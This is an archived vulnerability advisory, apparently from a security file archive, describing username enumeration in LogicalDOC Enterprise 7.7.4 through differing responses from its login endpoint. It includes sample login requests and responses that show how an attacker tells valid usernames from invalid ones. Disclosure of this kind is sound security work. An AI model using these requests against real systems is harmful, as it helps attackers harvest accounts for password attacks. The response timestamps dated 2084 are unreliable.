LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness: Posted Feb 12, 2018; Authored by LiquidWorm | Site zeroscience.mk; LogicalDOC Enterprise version 7.7.4 suffers from a username enumeration weakness vulnerability.; tags | exploit; SHA-256 | 3341c6779b81ffecf5473a04978fa7c12903c213c570b25e23f72268fefccb43; Download | Favorite | View

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness


LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness


Vendor: LogicalDOC Srl
Product web page: https://www.logicaldoc.com
Affected version: 7.7.4
                  7.7.3
                  7.7.2
                  7.7.1
                  7.6.4
                  7.6.2
                  7.5.1
                  7.4.2
                  7.1.1

Summary: LogicalDOC is a free document management system that is designed
to handle and share documents within an organization. LogicalDOC is a content
repository, with Lucene indexing, Activiti workflow, and a set of automatic
import procedures.

Desc: The weakness is caused due to the 'j_spring_security_check' script
and how it verifies provided credentials. Attacker can use this weakness
to enumerate valid users on the affected node.

Tested on: Microsoft Windows 10
           Linux Ubuntu 16.04
           Java 1.8.0_161
           Apache-Coyote/1.1
           Apache Tomcat/8.5.24
           Apache Tomcat/8.5.13
           Undisclosed 8.41


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2018-5451
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5451.php


26.01.2018

--


Request/response for existent username:
---------------------------------------

POST /j_spring_security_check HTTP/1.1
Host: 192.168.1.74:8080

j_username=admin&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp

--

HTTP/1.1 302 
Set-Cookie: ldoc-failure=wrongpassword
Location: //login.jsp?failure=wrongpassword
Content-Length: 0
Date: Tue, 06 Feb 2084 19:42:15 GMT
Connection: close


Request/response for non-existent username:
-------------------------------------------

POST /j_spring_security_check HTTP/1.1
Host: 192.168.1.74:8080

j_username=n00b&j_password=123123&j_successurl=%2Ffrontend.jsp&j_failureurl=%2Flogin.jsp

--

HTTP/1.1 500 
Set-Cookie: JSESSIONID=F06F1D03E249D90802AFE92428DBBEDD; Path=/; Secure; HttpOnly
Content-Type: text/html;charset=UTF-8
Content-Length: 78
Date: Tue, 06 Feb 2084 19:57:14 GMT
Connection: close

<html>
<body>
  <div><br/><br/><strong>ERROR</strong></div>
</body>
<html>

Top Authors In Last 30 Days

Red Hat 263 files
indoushka 179 files
Jay Turla 150 files
Ubuntu 85 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Gentoo 25 files
Karn Ganeshen 23 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,125)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,592)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,340)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,897)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,876)
UNIX (9,458)
UnixWare (188)
Windows (6,772)
Other

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

Share This

LogicalDOC Enterprise 7.7.4 Username Enumeration Weakness

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems